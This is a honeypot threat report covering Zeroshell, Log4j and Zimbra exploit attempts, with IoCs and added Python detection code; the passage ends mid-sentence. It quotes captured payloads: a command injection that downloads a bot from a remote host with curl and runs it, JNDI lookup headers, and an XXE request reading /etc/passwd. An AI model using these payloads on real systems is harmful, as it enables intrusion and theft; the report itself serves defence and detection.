
Our selection of alerts on honeypots: report 4 – February 2023

These past two weeks, the international TEHTRIS honeypots were again relentlessly hit by suspected malicious activity. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.

Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots

TEHTRIS NTA detected two malicious IP addresses performing inbound Zeroshell remote code execution (RCE) attempts. The attackers tried to compromise some of our European honeypots through CVE-2019-12725 (CVSSv3: 9.8).

The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on the German and Portuguese honeypots. This IP address is listed in public databases identifying malicious IP addresses.

The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is not listed in public databases of malicious IPs. This IP performed only one hit, on a German honeypot.

The request below is the download stage of the Zero botnet:

GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0

URL decoded: “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”

The IP address included in the packet above (5.206.227[.]228), likely a C2, is a known Portuguese address used for exploiting Zeroshell. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.
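A triage helper for this kind of hit, written as an added example (not TEHTRIS code): it URL-decodes the kerbynet request line, splits the query on `&` only so the injected `;` chain stays inside the `type` value, and extracts the download URL and payload name as IoCs. The request line is constructed from the one shown above, with the download host kept defanged.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample: the kerbynet hit reported above, with the download host defanged.
SAMPLE_REQUEST_LINE = (
    "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;"
    "curl%20-O%20http%3A%2F%2F5.206.227[.]228%2Fzero;sh%20zero;%22 HTTP/1.0"
)
# Constructed sample: a request with the same endpoint and a plain 'type' value.
BENIGN_REQUEST_LINE = "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=cert HTTP/1.0"

# Characters that close the quoted value and chain another shell command.
SHELL_METACHARS = re.compile(r'[;|&`]|\$\(')
URL_RE = re.compile(r'https?://[^\s;"\']+')


def parse_query(raw_query):
    """Split on '&' only: parse_qs on older Pythons also splits on ';', which would hide the payload."""
    params = {}
    for pair in raw_query.split('&'):
        key, _, value = pair.partition('=')
        params[key] = unquote(value)
    return params


def analyse_request_line(line):
    """Return a finding for a kerbynet request carrying shell metacharacters in 'type', else None."""
    _method, target, _version = line.split(' ', 2)
    parts = urlsplit(target)
    if not parts.path.endswith('/cgi-bin/kerbynet'):
        return None
    params = parse_query(parts.query)
    type_value = params.get('type', '')
    if not SHELL_METACHARS.search(type_value):
        return None
    urls = URL_RE.findall(type_value)
    return {
        'cve': 'CVE-2019-12725',
        'action': params.get('Action'),
        'injected': type_value,
        'download_urls': urls,
        'payload_names': [u.rsplit('/', 1)[-1] for u in urls],
    }


if __name__ == '__main__':
    print(analyse_request_line(SAMPLE_REQUEST_LINE))
    print(analyse_request_line(BENIGN_REQUEST_LINE))
```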

Log4j exploit attempts on a Swedish honeypot

One of our Swedish honeypots has been the target of a large number of “jndi” requests, which are known to be used in attempts to exploit the Log4j vulnerability on devices.

27 IP addresses sent the following set of headers, which was the most frequently seen:

['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']

The other header sets observed are identical, except that the port number 8182 varies within the range 8180 to 8189.
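Detection logic for this header pattern, as an added example that is not part of the report: it collapses the `$ {jndi` spelling to `${jndi`, counts the headers carrying a lookup, and checks whether the callback port falls in the 8180-8189 range that fingerprints this campaign. The header list is constructed from the one shown above.

```python
import re

# Constructed sample: a subset of the header set reported above (spacing kept as observed).
SAMPLE_HEADERS = [
    'origin: $ {jndi:ldap://:8182/a}',
    'x-api-version: $ {jndi:ldap://:8182/a}',
    'accept: */*',
    'authorization: $ {jndi:ldap://:8182/a}',
    'accept-encoding: gzip',
    'x-forwarded-host: $ {jndi:ldap://:8182/a}',
]
# Constructed sample: a lookup outside the campaign's port range.
OTHER_HEADERS = ['user-agent: ${jndi:ldap://:9999/a}', 'accept: */*']

# Whitespace between '$' and '{' is collapsed before matching so both spellings are caught.
JNDI_RE = re.compile(
    r'\$\{\s*jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]*):?(?P<port>\d+)?', re.I)
CAMPAIGN_PORTS = set(range(8180, 8190))


def normalise(value):
    return re.sub(r'\$\s+\{', '${', value)


def scan_headers(headers):
    """Return (names of headers carrying a JNDI lookup, set of callback ports seen)."""
    hits, ports = [], set()
    for raw in headers:
        name, _, value = raw.partition(':')
        m = JNDI_RE.search(normalise(value.strip()))
        if m:
            hits.append(name.strip().lower())
            if m.group('port'):
                ports.add(int(m.group('port')))
    return hits, ports


def classify(headers):
    """'clean', 'log4j-campaign' (ports all in 8180-8189) or 'log4j-other'."""
    hits, ports = scan_headers(headers)
    if not hits:
        return 'clean'
    if ports and ports <= CAMPAIGN_PORTS:
        return 'log4j-campaign'
    return 'log4j-other'


if __name__ == '__main__':
    print(scan_headers(SAMPLE_HEADERS), classify(SAMPLE_HEADERS))
```

The regex only covers the plain `${jndi:` form seen here; nested-lookup obfuscations need a separate rule.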

Here are the top 10 IoCs – all listed in public databases identifying malicious IPs:

IP | AS | Country
93.91.117[.]60 | AS 47562 Fast Link Ltd | RU
120.236.74[.]234 | AS 9808 China Mobile Communications Group Co., Ltd. | CN
85.51.217[.]156 | AS 12479 Orange Espagne SA | ES
118.41.204[.]72 | AS 4766 Korea Telecom | KR
222.103.98[.]58 | AS 4766 Korea Telecom | KR
72.132.58[.]237 | AS 20001 TWC-20001-PACWEST | US
178.140.136[.]178 | AS 42610 Rostelecom | RU
223.171.91[.]144 | AS 17853 LGTELECOM | KR
46.170.151[.]34 | AS 5617 Orange Polska Spolka Akcyjna | PL
147.182.233[.]56 | AS 14061 DIGITALOCEAN-ASN | US

Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP

Thanks to TEHTRIS NTA, which automatically detects anomalies in traffic, we observed over the past two weeks an increase in attempts to exploit CVE-2019-9621 (CVSSv3: 7.5), which affects Zimbra versions prior to 8.8.11. Indeed, Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows server-side request forgery (SSRF) and XML External Entity (XXE) injection via the ProxyServlet component.

The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP, identified as malicious in public databases, first attacked our honeypots on 10 January.

Here is one example of the requests seen in an NTA packet capture:

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: xx.x.xxx.xx:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close

<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
  <Request>
    <EMailAddress>aaaaa</EMailAddress>
    <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
  </Request>
</Autodiscover>

The DOCTYPE line, which declares an external entity pointing to file:///etc/passwd and then references it as &xxe;, is an attempt to read the file /etc/passwd, which notably contains the list of the users of the machine.
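An added example (not TEHTRIS or Zimbra code) showing the defender's two sides of this request: a detector that lists the external entities declared in a posted body and which of them are actually referenced, and a hardened Autodiscover parser that refuses any body carrying a DTD before it reaches the XML parser. The bodies are constructed from the request above; the benign e-mail address is a placeholder.

```python
import re
import xml.etree.ElementTree as ET

AUTODISCOVER_NS = 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a'

# Constructed sample: the body of the XXE request reported above.
XXE_BODY = (
    '<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    f'<Autodiscover xmlns="{AUTODISCOVER_NS}"><Request><EMailAddress>aaaaa</EMailAddress>'
    '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>'
)
# Constructed sample: a well-formed request with no DTD (address is a placeholder).
BENIGN_BODY = (
    f'<Autodiscover xmlns="{AUTODISCOVER_NS}"><Request><EMailAddress>user@example.com</EMailAddress>'
    f'<AcceptableResponseSchema>{AUTODISCOVER_NS}</AcceptableResponseSchema></Request></Autodiscover>'
)

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b', re.I)
# SYSTEM "uri" or PUBLIC "id" "uri": either form declares an external entity.
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<name>[^\s%]+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]*)"', re.I)


def find_external_entities(body):
    """Return (entity name, URI) pairs declared in an inline DTD; any hit is an XXE indicator."""
    return [(m.group('name'), m.group('uri')) for m in EXTERNAL_ENTITY_RE.finditer(body)]


def entities_referenced(body):
    """Names of declared external entities that the document body actually expands."""
    return [name for name, _uri in find_external_entities(body) if f'&{name};' in body]


def parse_autodiscover_safely(body):
    """Reject any DTD up front, then return the requested EMailAddress."""
    if DOCTYPE_RE.search(body):
        raise ValueError('DTD not allowed in Autodiscover requests')
    root = ET.fromstring(body)
    return root.findtext('a:Request/a:EMailAddress', namespaces={'a': AUTODISCOVER_NS})


if __name__ == '__main__':
    print(find_external_entities(XXE_BODY), entities_referenced(XXE_BODY))
    print(parse_autodiscover_safely(BENIGN_BODY))
```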

Attempts to exploit CVE-2019-16759 & CVE-2020-17496 on an Italian honeypot

Hardworking Bulgarian threat actors?

Masscan, an open-source scanner widely used